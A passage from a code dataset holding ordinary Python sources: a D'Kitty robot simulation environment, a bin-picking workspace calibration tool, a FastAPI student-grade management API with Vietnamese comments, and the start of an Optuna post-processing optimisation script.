configuration groups.\n DEFAULT_DKITTY_CALIBRATION_MAP.update_group_configs(config)\n else:\n config = DKITTY_SIM_CONFIG\n return config\n\n @classmethod\n def get_tracker_config(cls, **device_identifiers) -> Dict[str, Any]:\n \"\"\"Returns the robot configuration for the given device path.\"\"\"\n # Filter out None entries.\n device_identifiers = {\n name: device_id\n for name, device_id in device_identifiers.items()\n if device_id is not None\n }\n if device_identifiers:\n config = TRACKER_HARDWARE_CONFIG.copy()\n for name, device_id in device_identifiers.items():\n config['groups'][name]['device_identifier'] = device_id\n else:\n config = TRACKER_SIM_CONFIG\n return config\n\n def __init__(self,\n *args,\n robot_config: Dict[str, Any],\n tracker_config: Dict[str, Any],\n manual_reset: bool = False,\n **kwargs):\n \"\"\"Initializes the environment.\n\n Args:\n robot_config: A dictionary of keyword arguments to pass to\n RobotComponent.\n tracker_config: A dictionary of keyword arguments to pass to\n TrackerComponent.\n manual_reset: If True, waits for the user to reset the robot\n instead of performing the automatic reset procedure.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.robot = self._add_component(**robot_config)\n self.tracker = self._add_component(**tracker_config)\n self.manual_reset = manual_reset\n\n # Disable the constraint solver in hardware so that mimicked positions\n # do not participate in contact calculations.\n if self.has_hardware_robot:\n self.sim_scene.disable_option(constraint_solver=True)\n\n @property\n def has_hardware_robot(self) -> bool:\n \"\"\"Returns true if the environment is using a hardware robot.\"\"\"\n return isinstance(self.robot, DynamixelRobotComponent)\n\n @property\n def has_hardware_tracker(self) -> bool:\n \"\"\"Returns true if the environment is using a hardware tracker.\"\"\"\n return isinstance(self.tracker, VrTrackerComponent)\n\n def initialize_action_space(self) -> gym.Space:\n \"\"\"Returns the observation space to use for this environment.\"\"\"\n qpos_indices = self.robot.get_config('dkitty').qpos_indices\n return make_box_space(-1.0, 1.0, shape=(qpos_indices.size,))\n\n def _reset_dkitty_standing(self,\n root_pos: Optional[Sequence[float]] = None,\n root_vel: Optional[Sequence[float]] = None,\n kitty_pos: Optional[Sequence[float]] = None,\n kitty_vel: Optional[Sequence[float]] = None):\n \"\"\"Resets the D'Kitty to a standing position.\n\n Args:\n root_pos: The root position (x, y, z, rx, ry, rz) of the\n D'Kitty. (x, y, z) are in meters, rx, ry, rz are in radians.\n root_vel: The root velocity of the D'Kitty.\n kitty_pos: The joint positions (radians).\n kitty_vel: The joint velocities (radians/second).\n \"\"\"\n # Set defaults if parameters are not given.\n root_init_state, kitty_init_state = self.robot.get_initial_state(\n ['root', 'dkitty'])\n root_pos = (\n root_init_state.qpos if root_pos is None else np.asarray(root_pos))\n root_vel = (\n root_init_state.qvel if root_vel is None else np.asarray(root_vel))\n kitty_pos = (\n kitty_init_state.qpos\n if kitty_pos is None else np.asarray(kitty_pos))\n kitty_vel = (\n kitty_init_state.qvel\n if kitty_vel is None else np.asarray(kitty_vel))\n\n # For simulation, simply set the state.\n if not isinstance(self.robot, DynamixelRobotComponent):\n self.robot.set_state({\n 'root': RobotState(qpos=root_pos, qvel=root_vel),\n 'dkitty': RobotState(qpos=kitty_pos, qvel=kitty_vel),\n })\n return\n\n # Perform the scripted reset if we're not doing manual resets.\n if not self.manual_reset:\n scripted_reset.reset_standup(self.robot)\n\n # Move to the desired position.\n self.robot.set_state({\n 'dkitty': RobotState(qpos=kitty_pos, qvel=kitty_vel),\n })\n if self.manual_reset:\n # Prompt the user to start the episode.\n input('Press Enter to start the episode...')\n\n # Reset the hardware tracking position to consider the current world\n # position of the D'Kitty as the desired reset position.\n if self.has_hardware_tracker:\n self.tracker.set_state({\n 'torso': TrackerState(\n pos=root_pos[:3] + KITTY_HW_TRACKER_OFFSET,\n rot=euler2mat(*root_pos[3:6]),\n )\n },)\n self.robot.reset_time()\n\n def _get_root_qpos_qvel(\n self,\n root_robot_state: RobotState,\n torso_tracker_state: TrackerState,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Returns the root position and velocity of the robot.\n\n This is needed because we use a free joint to track the D'Kitty position\n for simulation, but we use a site tracker for hardware.\n \"\"\"\n if self.has_hardware_tracker:\n # Use hardware tracking as the root position and mimic back to sim.\n root_qpos = np.concatenate([\n torso_tracker_state.pos - KITTY_HW_TRACKER_OFFSET,\n mat2euler(torso_tracker_state.rot),\n ])\n self.data.qpos[:6] = root_qpos\n # TODO(michaelahn): Calculate angular velocity from tracking.\n root_qvel = np.zeros(6)\n else:\n root_qpos = root_robot_state.qpos\n root_qvel = root_robot_state.qvel\n return root_qpos, root_qvel\n","repo_name":"justinvyu/dsuite","sub_path":"dsuite/dkitty/base_env.py","file_name":"base_env.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7819213391","text":"'''''''''\nA Python scripts to set the workspace size \nAuthor: xinyi\nDate: 20210721\n---\nDefine workspace for bin picking task and update config file!\nStep 1 - Drag to select 2 or 4 rectangles and press [ENTER]\nStep 2 - Click to select 2 or 4 points and press [ENTER]\n[r] - refresh and reselect\n[q] - quit\n'''\nimport argparse\nimport cv2\nfrom bpbot.config import BinConfig\nfrom bpbot.device import PhxClient\nfrom bpbot.utils import *\n\nclass Workspace(object):\n def __init__(self, cfg_path=None):\n self.cfg = BinConfig(config_path=cfg_path, pre=False)\n self.cfgdata = self.cfg.data\n self.vis = None \n self.clone = None\n\n self.boxes = []\n self.points = []\n self.mat = np.loadtxt(self.cfgdata['calibmat_path'])\n\n def capture(self):\n pxc = PhxClient(host='127.0.0.1:18300')\n pxc.triggerframe()\n pc = pxc.getpcd()\n self.pc = pc\n \n self.grayscale = pxc.getgrayscaleimg()\n self.clone = cv2.cvtColor(self.grayscale, cv2.COLOR_GRAY2BGR)\n self.vis = self.clone.copy()\n \n pc = pc/1000\n H = np.loadtxt(self.cfgdata['calibmat_path'])\n pc_ = np.c_[pc, np.ones(pc.shape[0])]\n pr = np.dot(H, pc_.T).T\n self.arr = np.reshape(pr[:,2], (self.cfgdata['height'], self.cfgdata['width']))\n\n def recog_ar_marker(self, ids=[7]): \n self.capture()\n image = cv2.cvtColor(self.grayscale, cv2.COLOR_GRAY2RGB)\n recog_ids = detect_ar_marker(image.copy(), show=True)\n cv2.waitKey(2)\n for id in ids:\n if id in recog_ids.keys():\n x,y = recog_ids[id]\n p = self.pc[y*image.shape[1]+x]/1000\n\n p_robot = np.dot(self.mat, [*p, 1]) # unit: m\n p_robot = p_robot[:3]\n print(f\"=> Detected #{id}!\")\n print(f\" Camera ({p[0]:.3f},{p[1]:.3f},{p[2]:.3f})\")\n print(f\" Robot ({p_robot[0]:.3f},{p_robot[1]:.3f},{p_robot[2]:.3f})\")\n else: \n print(\"Marker #{id} not detected\")\n \n\n def refresh_drag(self): \n self.vis = self.clone.copy()\n self.boxes.clear()\n def refresh_click(self):\n self.vis = self.clone.copy()\n self.points.clear()\n\n def on_drag(self, event, x, y, flags, params):\n # global img\n if event == cv2.EVENT_LBUTTONDOWN:\n print(f\"Start Mouse Position: {x},{y}\")\n sbox = [x, y]\n self.boxes.append(sbox)\n\n elif event == cv2.EVENT_LBUTTONUP:\n print(f\"End Mouse Position: {x},{y}\")\n ebox = [x, y]\n self.boxes.append(ebox)\n cv2.rectangle(self.vis, (self.boxes[-2][0], self.boxes[-2][1]), (self.boxes[-1][0], self.boxes[-1][1]), (0,255,0), 3)\n \n def on_click(self, event, x, y, flags, params):\n if event == cv2.EVENT_LBUTTONDOWN:\n print(f\"Mouse Position: {x},{y}, => {self.arr[y,x]:.3f}\")\n cv2.circle(self.vis,(x,y),5,(0,255,0),-1)\n self.points.append([x,y])\n \n def select_points(self):\n self.points = []\n while(True):\n cv2.namedWindow('Click')\n cv2.setMouseCallback('Click', self.on_click, 0)\n cv2.imshow('Click', self.vis)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('r'):\n self.refresh_click()\n if key == ord('q'):\n cv2.destroyAllWindows()\n break\n if key == ord('a'):\n self.auto_define()\n break\n\n if len(self.points) <= 4 and key == 13: # enter\n cv2.destroyAllWindows()\n break\n\n def auto_define(self):\n self.points = []\n top_id = 28\n bottom_ids = [21,22]\n real_d = 20+20+29/3\n\n image = cv2.cvtColor(self.grayscale, cv2.COLOR_GRAY2RGB)\n ids = detect_ar_marker(image.copy(), show=True)\n cv2.waitKey(2)\n if top_id in ids:\n x,y = ids[top_id]\n pick_max = self.arr[y,x]\n print(f\"Detected top: {x},{y}, => {pick_max:.3f}\")\n if bottom_ids[0] in ids and bottom_ids[1] in ids:\n x0, y0 = ids[bottom_ids[0]]\n x1, y1 = ids[bottom_ids[1]]\n pixel_d = calc_2points_distance((x0,y0),(x1,y1))\n pick_min = (self.arr[y0,x0]+self.arr[y1,x1])/2\n print(f\"Detected bottom: {x},{y}, => {pick_min:.3f}\")\n \n self.cfgdata['main']['height']['min'] = float(pick_min)-0.002\n self.cfgdata['main']['height']['max'] = float(pick_max)\n self.cfgdata['real2pixel'] = float(pixel_d/real_d)\n self.cfg.write()\n\n print(\"Successfully defined **height** of picking workspace! \")\n\n def select_boxes(self):\n self.boxes = []\n while(True):\n cv2.namedWindow('Drag')\n cv2.setMouseCallback('Drag', self.on_drag, 0)\n cv2.imshow('Drag', self.vis)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('r'):\n self.refresh_drag()\n if key == ord('q'):\n cv2.destroyAllWindows()\n break\n if len(self.boxes)/2 <= 2 and key == 13: # enter\n cv2.destroyAllWindows()\n break\n\n def select(self):\n self.select_boxes()\n self.select_points()\n\n def define(self):\n if len(self.boxes) == 4:\n self.cfgdata['main']['area']['left'] = self.boxes[0][0]\n self.cfgdata['main']['area']['top'] = self.boxes[0][1]\n self.cfgdata['main']['area']['right'] = self.boxes[1][0]\n self.cfgdata['main']['area']['bottom'] = self.boxes[1][1]\n self.cfgdata['buffer']['area']['left'] = self.boxes[2][0]\n self.cfgdata['buffer']['area']['top'] = self.boxes[2][1]\n self.cfgdata['buffer']['area']['right'] = self.boxes[3][0]\n self.cfgdata['buffer']['area']['bottom'] = self.boxes[3][1]\n self.cfg.write()\n print(\"Successfully defined **area** of picking workspace! \")\n print(\"Successfully defined **area** of dropping workspace! \")\n\n elif len(self.boxes) == 2:\n self.cfgdata['main']['area']['left'] = self.boxes[0][0]\n self.cfgdata['main']['area']['top'] = self.boxes[0][1]\n self.cfgdata['main']['area']['right'] = self.boxes[1][0]\n self.cfgdata['main']['area']['bottom'] = self.boxes[1][1]\n self.cfg.write()\n print(\"Successfully defined **area** of picking workspace! \")\n\n else:\n print(\"Did not calibrate area of workspace! \")\n\n if len(self.points) == 4:\n h = [self.arr[self.points[0][1], self.points[0][0]], self.arr[self.points[1][1], self.points[1][0]]]\n [pick_min, pick_max] = h if h[0] < h[1] else [h[1], h[0]]\n\n h = [self.arr[self.points[2][1], self.points[2][0]], self.arr[self.points[3][1], self.points[3][0]]]\n [drop_min, drop_max] = h if h[0] < h[1] else [h[1], h[0]]\n self.cfgdata['main']['height']['min'] = float(pick_min)\n self.cfgdata['main']['height']['max'] = float(pick_max)\n self.cfgdata['buffer']['height']['min'] = float(drop_min)\n self.cfgdata['buffer']['height']['max'] = float(drop_max)\n self.cfg.write()\n print(\"Successfully defined **height** of picking workspace! \")\n print(\"Successfully defined **height** of dropping workspace! \")\n\n elif len(self.points) == 2:\n h = [self.arr[self.points[0][1], self.points[0][0]], self.arr[self.points[1][1], self.points[1][0]]]\n [pick_min, pick_max] = h if h[0] < h[1] else [h[1], h[0]]\n self.cfgdata['main']['height']['min'] = float(pick_min)\n self.cfgdata['main']['height']['max'] = float(pick_max)\n self.cfg.write()\n print(\"Successfully defined **height** of picking workspace! \")\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('mode', type=str, help='marker or none')\n parser.add_argument('--file_path','-f', type=str, help='if you want to save a new config file, enter the file path')\n args = parser.parse_args()\n \n ws = Workspace(args.file_path)\n\n if args.mode == 'marker':\n ws.recog_ar_marker()\n else:\n print(\"Define workspace for bin picking task and update config file! \")\n print(\"Step 1 - Drag to select 2 or 4 rectangles and press [ENTER]\")\n print(\"Step 2 - Click to select 2 or 4 points and press [ENTER]\")\n print(\"[r] - refresh and reselect\")\n print(\"[q] - quit\")\n print(\"[a] - automatically define the height\")\n \n ws.capture()\n ws.select()\n ws.define()\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinyiz0931/bin-picking-robot","sub_path":"example/run_workspace.py","file_name":"run_workspace.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"26932034699","text":"\nimport os\nimport webbrowser\nfrom fastapi import FastAPI, Depends, HTTPException, Response\nfrom typing import Union\nfrom fastapi.responses import HTMLResponse\nfrom sqlalchemy import and_\nimport sql.models as models\nfrom database import engine, get_db\nimport sqlite3\nimport time\nfrom sql.default_data import Connect\nfrom sqlalchemy.orm import Session\nimport sql.schemas as schema\nimport numpy as np\nimport pandas as pd\nimport description as des\n\n\nmodels.Base.metadata.create_all(bind = engine)\n#Connect()\nwhile True:\n try:\n conn = sqlite3.connect('StudentGrade.db')\n cursor = conn.cursor()\n print(\"Database connected\")\n break\n except Exception as error:\n print (\"Database Connection Failed\")\n print(\"Error\", error)\n time.sleep(2)\n\n\napp = FastAPI( title= \"Quản lý điểm sinh viên\",\n description= des.description, openapi_tags= des.tags,\n contact={\n \"name\" : \"Source code\",\n \"url\" : \"https://github.com/potatoArthurDo/Python-K1N2/tree/main\"\n } )\n\n@app.get('/', response_class=HTMLResponse, tags=['Trang chủ'])\ndef home():\n html_content = '''\n <!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>Document\n\n\n

BÀI TẬP LỚN MÔN PYTHON

\n
Nhóm 5
\n
Quản lý điểm sinh viên
\n
Thành viên:
\n
    \n
  • A37527 - Đỗ Anh Thư
  • \n
  • A38322 - Trần Văn Tú
  • \n
  • A38221 - Vũ Thế Dương
  • \n
\n\n'''\n return HTMLResponse(content=html_content, status_code=200)\n \n\n\n################## AnhThu numpy \n# Calculate the percentage of non zero final scores\n@app.get(\"/NonZeroNP\", tags=['Anh Thư Numpy'],\n description=des.des_api['AnhThuNP']['ThongKeDiem0'])\ndef non_zero(db: Session = Depends(get_db)):\n query_rs = db.query(models.Grade.final.label(\"Grade\")).all()\n array = np.array(query_rs)\n np.reshape(array, -1)\n non = np.count_nonzero(array)/100\n return {\n \"msg\" : f'The percentage of score that is not zero is {non}%',\n #\"comment\" : f'Quite realistic if you compare it to this class s mid-score report, lol',\n \"data\" : non\n }\n\n\n\n#Change student's one subject score \n@app.post(\"/ChangeScoreNP\", tags=['Anh Thư Numpy'],\n description=des.des_api['AnhThuNP']['CapNhatDiemSo'])\ndef get_change(student : schema.UpdateScore, db : Session = Depends(get_db)):\n if student.studentID > 0:\n if student.subjectID > 0 and student.subjectID < 6:\n if student.midScore < 4:\n student.endScore = 0\n db.query(models.Grade).filter(\n and_(\n models.Grade.student_id == student.studentID,\n models.Grade.subject_id == student.subjectID\n )\n ).update({\n 'mid_term' : student.midScore,\n 'end_term' : 0,\n 'final' : 0\n\n })\n else:\n\n db.query(models.Grade).filter(\n and_(\n models.Grade.student_id == student.studentID,\n models.Grade.subject_id == student.subjectID\n )\n ).update({\n 'mid_term' : student.midScore,\n 'end_term' : student.endScore,\n 'final' :np.round( student.midScore * 0.3 + student.endScore * 0.7)\n\n })\n db.commit()\n query_rs = db.query(models.Student.name.label(\"Name\"),\n models.Subject.name.label(\"Subject\"),\n models.Grade.mid_term.label(\"Mid Term\"),\n models.Grade.end_term.label(\"End Term\"),\n models.Grade.final.label(\"Final\")).select_from(models.Student).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Grade.student_id== student.studentID,\n models.Grade.subject_id == student.subjectID\n\n )\n ).all()\n df = pd.DataFrame.from_dict(query_rs)\n return df.T\n else:\n raise HTTPException(status_code=404, detail= {\n \"field\" : \"subjectID\",\n \"msg\" : \"Subject ID is a number from 1 to 5\"\n })\n\n else:\n raise HTTPException(status_code=404, detail= {\n \"field\" : \"studentID\",\n \"msg\" : \"Student ID must be larger than 0\"\n })\n \n\n\n\n################## AnhThu pandas\n#Students that achived score \"10\" for final, return a html table\n@app.get(\"/getTopPD\", tags=['Anh Thư Pandas'],\n description= des.des_api['AnhThuPD']['DanhSachDiem10'])\ndef get_top(db : Session = Depends(get_db)):\n query_rs = db.query(models.Student.name.label(\"Name\"), models.Subject.name.label(\"Subject\"),\n models.Grade.final.label(\"Score\")).filter(\n models.Grade.final == 10 ).join(models.Student).join(models.Subject).all()\n df = pd.DataFrame.from_dict(query_rs)\n table = df.to_html()\n text_file = open(\"list.html\", \"w\")\n text_file.write(table)\n text_file.close()\n webbrowser.open(os.getcwd() + '/list.html')\n return HTMLResponse(content = table, status_code = 200)\n\n#Students that achived the same score as the input\n@app.post(\"/getSimilarPD\", tags=['Anh Thư Pandas'],\n description=des.des_api['AnhThuPD']['DanhSachGiongNhau'])\ndef get_similar(score : schema.ScoreBase, db : Session = Depends(get_db)):\n if score.midScore < 0 or score.endScore < 0:\n raise HTTPException(status_code=404, detail= {\n \"field\" : \"midScore,endScore\",\n \"msg\" : \"Score must be postitive\"\n })\n else:\n if score.midScore < 4:\n score.endScore = 0\n data = db.query(\n models.Student.id.label(\"Student ID\"),\n models.Student.name.label(\"Student Name\"),\n models.Class.name.label(\"Class\"),\n models.Subject.name.label(\"Subject\"),\n models.Grade.mid_term.label(\"Mid term\"),\n models.Grade.end_term.label(\"End term\")\n ).select_from(models.Student).join(models.Class).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Grade.mid_term == score.midScore,\n models.Grade.end_term == score.endScore\n )\n ).all()\n df = pd.DataFrame.from_dict(data)\n if (data == []) :\n return {\"result\" : \"No data\"}\n table = df.to_html()\n text_file = open(\"similar_list.html\", \"w\")\n text_file.write(table)\n text_file.close()\n webbrowser.open(os.getcwd() + '/similar_list.html')\n return HTMLResponse(content = table, status_code = 200)\n\n############################## VuDuong Region\n## np\n## Lấy sĩ số lớp dựa theo mã lớp\n@app.post('/subject/GetClassSize', tags=[\"Thế Dương Numpy\"],\n description= des.des_api['TheDuongNP']['SiSoLop'])\n\ndef Send_Id_GetClassSz(classID : schema.ClassBase , db: Session = Depends(get_db)):\n if classID.classID != None and classID.classID > 0:\n classSz = db.query(models.Student).join(models.Class).filter(models.Class.id == classID.classID).all()\n fullClass = db.query(models.Class).all()\n #Tổng số sinh viên trong lớp\n num_Student_inClass = len(np.array(classSz))\n #Tổng số lớp\n allClass = len(np.array(fullClass))\n\n if (classID.classID > allClass):\n return f\"Mã lớp {classID.classID} không tồn tại !\"\n else:\n return f\"Sĩ số lớp có mã lớp {classID.classID} là {num_Student_inClass} sinh viên \"\n else:\n raise HTTPException(status_code=404, detail=\n f\"Mã lớp {classID.classID} không hợp lệ !\"\n )\n#np\n#Hiển thị điểm trung bình môn theo mã lớp, mã môn\n@app.get('/subject/ClassSubjectAvgPoint/{classid}/{subjectid}',\n tags = ['Thế Dương Numpy'],\n description= des.des_api['TheDuongNP']['TrungBinhMon'])\n\ndef get_avg_point_subject( classid: Union[int, None] = None, subjectid: Union[int, None] = None , db: Session = Depends(get_db)):\n if classid > 0:\n if subjectid > 0:\n classPoint = db.query( models.Subject.name.label('Môn học'),\n models.Class.name.label('Lớp'),\n models.Grade.final.label('Điểm tổng kết')\n ).select_from(models.Student).join(models.Class).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Student.class_id == classid,\n models.Grade.subject_id == subjectid\n )\n ).all()\n df = pd.DataFrame.from_dict(classPoint)\n Lop = df['Lớp'][0]\n subject = df['Môn học'][0]\n diemTK= np.array([df['Điểm tổng kết']])\n diem = np.round(np.mean(diemTK), 1)\n return f'Điểm trung bình môn {subject} của lớp {Lop} là {diem}'\n else:\n raise HTTPException(status_code=404, detail={\n \"field\": \"subjectid\",\n \"errMsg\": \"Thông tin không hợp lệ\"\n })\n else:\n raise HTTPException(status_code=404, detail={\n \"field\": \"classid\",\n \"errMsg\": \"Thông tin không hợp lệ\"\n })\n \n#pd\n#Thống kê điểm của môn học theo lớp\n@app.get('/statistic/Subject/{subjectid}',\n tags = ['Thế Dương Pandas'],\n description= des.des_api['TheDuongPD']['ThongKeDiemTheoMonHoc'])\ndef get_point_subject_class(subjectid: int, db: Session = Depends(get_db)):\n if(subjectid > 0):\n getSubject = db.query(models.Subject).all()\n if(subjectid > len(getSubject)):\n return {\n \"msg\": \"Không tồn tại môn học\"\n }\n else:\n listStudent = db.query(models.Student.name.label('Họ và tên'),\n models.Class.name.label('Lớp'),\n models.Subject.name.label('Môn học'),\n models.Grade.mid_term.label('Điểm giữa kỳ'),\n models.Grade.end_term.label('Điểm cuối kỳ'),\n models.Grade.final.label('Điểm tổng kết')).select_from(models.Student).join(models.Class).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Grade.subject_id == subjectid\n )\n ).all()\n if( len(listStudent) != 0):\n df = pd.DataFrame.from_dict(listStudent)\n classList = df.groupby(df['Lớp']).mean(numeric_only = True).applymap(lambda x: np.round(x, 2))\n subjectName = df['Môn học'][0]\n return {\n \"msg\": f\"Thống kê điểm tổng kết theo lớp môn {subjectName}\",\n \"data\" : classList.T\n }\n else:\n return {\n \"msg\": \"Không tồn tại bản ghi nào\"\n }\n else:\n raise HTTPException(status_code=404, detail={\n \"field\" : \"subjectid\",\n \"errMsg\" : \"Giá trị subjectid không thể nhỏ hơn hoặc bằng 0\"\n })\n#pd\n#Cập nhật tên lớp theo mã lớp\n@app.post('/class/UpdateNameClass', tags=['Thế Dương Pandas'],\n description= des.des_api['TheDuongPD']['CapNhatTenLop'])\ndef post_classroom(classroom: schema.Classroom, db : Session = Depends(get_db)):\n result = \" \"\n if classroom.classid >0 :\n db.query(models.Class).filter(models.Class.id == classroom.classid).update(\n {\n 'name': classroom.className\n })\n db.commit()\n result = db.query(models.Class).filter(models.Class.id == classroom.classid).first()\n \n else:\n result = {\n \"field\": \"classid\",\n \"errMsg\": \"Thông tin không hợp lệ\"\n }\n\n return result\n\n############################## TranTu Region\n#Numpy\n\n#Tính điểm trung bình cuối kì tất cả các môn của một sinh viên theo mã sinh viên \n@app.get('/average_grade/{student_id}', tags=['Trần Văn Tú Numpy'],\n description= des.des_api['TranTuNP']['TrungBinhCuoiKi'])\ndef get_average_grade(student_id: int, db: Session = Depends(get_db)):\n\n student = db.query(models.Student).filter(models.Student.id == student_id).first()\n\n if student:\n grades = db.query(models.Grade).filter(models.Grade.student_id == student_id).all()\n\n if grades:\n grade_values = np.array([grade.final for grade in grades])\n average_grade = np.mean(grade_values)\n return student.name + ' mã sinh viên ' + str(student_id) + ' có điểm cuối kì trung bình là ' + str(average_grade)\n \n else:\n return {\n \"Không tồn tại bản ghi nào\"\n }\n \n else:\n raise HTTPException(status_code=404, detail=f\"sinh viên với ID {student_id} không tồn tại.\")\n \n################################\n#Điểm trung bình cuối kì tất cả các môn của một lớp theo mã lớp\n@app.post('/class/CalculateClassAvg', tags=['Trần Văn Tú Numpy'],\n description= des.des_api['TranTuNP']['TrungBinhCuoiKiLop'])\ndef Calculate_Class_Avg(classID: schema.ClassBase, db: Session = Depends(get_db)):\n if classID.classID != None and classID.classID > 0:\n \n grades = db.query(models.Grade).join(models.Student).join(models.Class).filter(models.Class.id == classID.classID).all()\n\n finals = np.array([grade.final for grade in grades])\n\n avg_final = np.mean(finals)\n \n # Lấy danh sách tất cả lớp\n fullClass = db.query(models.Class).all()\n \n # Tính tổng số lớp\n allClass = len(np.array(fullClass))\n \n if classID.classID > allClass:\n return f\"Mã lớp {classID.classID} không tồn tại!\"\n else:\n return f\"Điểm trung bình cuối tất cả các môn của lớp có mã lớp {classID.classID} là {avg_final:.2f}\"\n else:\n raise HTTPException(status_code=404, detail=f\"Mã lớp {classID.classID} không hợp lệ!\")\n \n\n#Pandas\n\n#Đếm số sinh viên qua môn\n@app.get('/passing_students/{subject_id}', tags=['Trần Văn Tú Pandas'],\n description=des.des_api['TranTuPD']['QuaMon'])\ndef count_passing_students_by_subject(subject_id: int, db: Session = Depends(get_db)):\n if subject_id > 0:\n get_subject = db.query(models.Subject).all()\n if subject_id > len(get_subject):\n return {\"msg\": \"Không tồn tại môn học\"}\n else:\n subject = get_subject[subject_id - 1]\n\n df_students = pd.read_sql_query(\n f\"SELECT final AS 'Điểm tổng kết' FROM Student \"\n f\"JOIN Class ON Student.class_id = Class.id \"\n f\"JOIN Grade ON Student.id = Grade.student_id \"\n f\"JOIN Subject ON Grade.subject_id = Subject.id \"\n f\"WHERE Subject.id = {subject_id} AND Grade.final >= 4\",\n db.bind\n )\n\n num_passing_students = len(df_students)\n\n return {\n \"msg\": f\"Số sinh viên qua môn {subject.name} là: {num_passing_students}\"\n }\n else:\n raise HTTPException(status_code=404, detail={\n \"field\": \"subject_id\",\n \"errMsg\": \"Giá trị subject_id không thể nhỏ hơn hoặc bằng 0\"\n })\n\n#Cập nhật tên môn học\n@app.post('/subject/UpdateSubjectName', tags=['Trần Văn Tú Pandas'],\n description=des.des_api['TranTuPD']['CapNhatTenMon'])\ndef update_subject_name(subject_update: schema.SubjectUpdate, db: Session = Depends(get_db)):\n result = {}\n subject = db.query(models.Subject).filter(models.Subject.id == subject_update.subject_id).first()\n \n if subject:\n db.query(models.Subject).filter(models.Subject.id == subject_update.subject_id).update(\n {\n 'name': subject_update.subject_name\n }\n )\n db.commit()\n \n updated_subject = db.query(models.Subject).filter(models.Subject.id == subject_update.subject_id).first()\n \n result = {\n 'message': 'Tên môn đã được cập nhật',\n 'updated_subject': updated_subject\n }\n else:\n result = {\n 'message': 'Mã môn không tồn tại'\n }\n\n return result\n\n","repo_name":"potatoArthurDo/Python-K1N2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17693,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19398073689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# optimize_postprocess.py training_dir weight_dir\n# training_dir : dossier du training. \n# Défault : training le plus récent dans config['local']['trainings_dir']/config['data']['nomenclature']['name']\n# weights_dir : nom du dossier de poids à utiliser dans le training/train_weights\n# Défaut : le meilleur modèle dans training_dir\n#\n# script d'optimisation du postprocess, ie des poids associé aux 2 postprocess disponibles :\n# - ajout des similarité des noeuds parents\n# - boost de la similarité par une mesure de similarité textuelle basée sur le compte de trigrammes\n# la valeur optimisée est le top-k avec k=config['post_process']['top_X_to_optimize']\n#\n# le script utilise optuna: pour générer des valeurs pour les 2 paramêtres, calculer les performances sur un \n# - on charge le modèle\n# - on charge les données de test du training (jamais vu par le modèle)\n# - on sépare en train/test à nouveau (50/50)\n# - optuna génère des valeurs pour les 2 paramêtres, calcule les performances sur le train et sauvegarde le tout\n# - on s'arrète après config['post_process']['optim_timeout_in_min'] minutes ou config['post_process']['nb_trials'] essais\n# - on update le config.yaml du training avec les meilleures valeurs trouvées\n# - on calcule les performances sur le test avec les meilleurs valeurs de parametres, et on sauvegarde le tout en local et en remote\n#\n# utilise config.yaml dans le dossier de training\n#\n# @author cyril.poulet@starclay.fr\n# @date: oct 2020\n\nimport sys\nsys.path.append('..')\nimport os\nimport yaml\nimport json\nimport shutil\nimport logging.config\nimport s3fs\nfrom tensorflow import keras\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport optuna\nfrom optuna import Trial\n\nfrom data_import.bdd import PostGre_SQL_DB\nfrom training_utils import load_config, save_config, push_to_minio, get_trainings_dir, get_last_local_training_dir, get_best_savedmodel\nfrom script_run_top_k import load_model_from_save_dir, run_top_k_on_test\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Script permettant d'optimiser les paramêtres de post-process via une exploration de l'espace'\n\n \"\"\"\n import argparse\n args = None\n \n # Logging - Chargement du fichier de configuration log\n with open(os.path.join(os.path.dirname(__file__), 'logging.conf.yaml'), 'r') as stream:\n log_config = yaml.load(stream, Loader=yaml.FullLoader)\n logging.config.dictConfig(log_config)\n\n logger = logging.getLogger()\n\n # path to test\n with open(\"config.yaml\") as f:\n base_config = yaml.safe_load(f)\n TRAININGS_LOCAL_DIR, _ = get_trainings_dir(base_config)\n \n parser = argparse.ArgumentParser(\n description=\"Script pour optimiser le post-process\")\n parser.add_argument(\"model_dir\", nargs='?', type=str, default=None,\n help=\"dossier du training\")\n parser.add_argument(\"weights_dir\", nargs='?', type=str, default=None,\n help=\"nom du dossier de poids à utiliser dans le training/train_weights\")\n args = parser.parse_args()\n \n if hasattr(args, 'model_dir') and args.model_dir:\n save_dir = os.path.abspath(args.model_dir)\n else:\n save_dir = get_last_local_training_dir(TRAININGS_LOCAL_DIR)\n if hasattr(args, 'weights_dir') and args.weights_dir:\n best_weights = os.path.abspath(args.weights_dir)\n else:\n best_weights = get_best_savedmodel(save_dir)\n \n \n save_dir = get_last_local_training_dir(TRAININGS_LOCAL_DIR)\n best_weights = get_best_savedmodel(save_dir)\n\n # add log in training dir\n test_log_file = os.path.join(save_dir, 'topk.log')\n formatter = logging.Formatter(log_config['formatters']['simple']['format'])\n ch = logging.FileHandler(test_log_file)\n ch.setLevel('DEBUG')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger_name = 'NomenclatureTopKOptimizer'\n logger = logging.getLogger(logger_name)\n \n logger.info(f'Running post-process optimizer pour {save_dir}/{best_weights}')\n config = load_config(save_dir)\n sync_with_minio = config['minio']['sync']\n\n # re-load all elements\n logger.info('Loading all trained objects')\n try:\n nomenclature, data_cleaner, data_formatter, model, _ 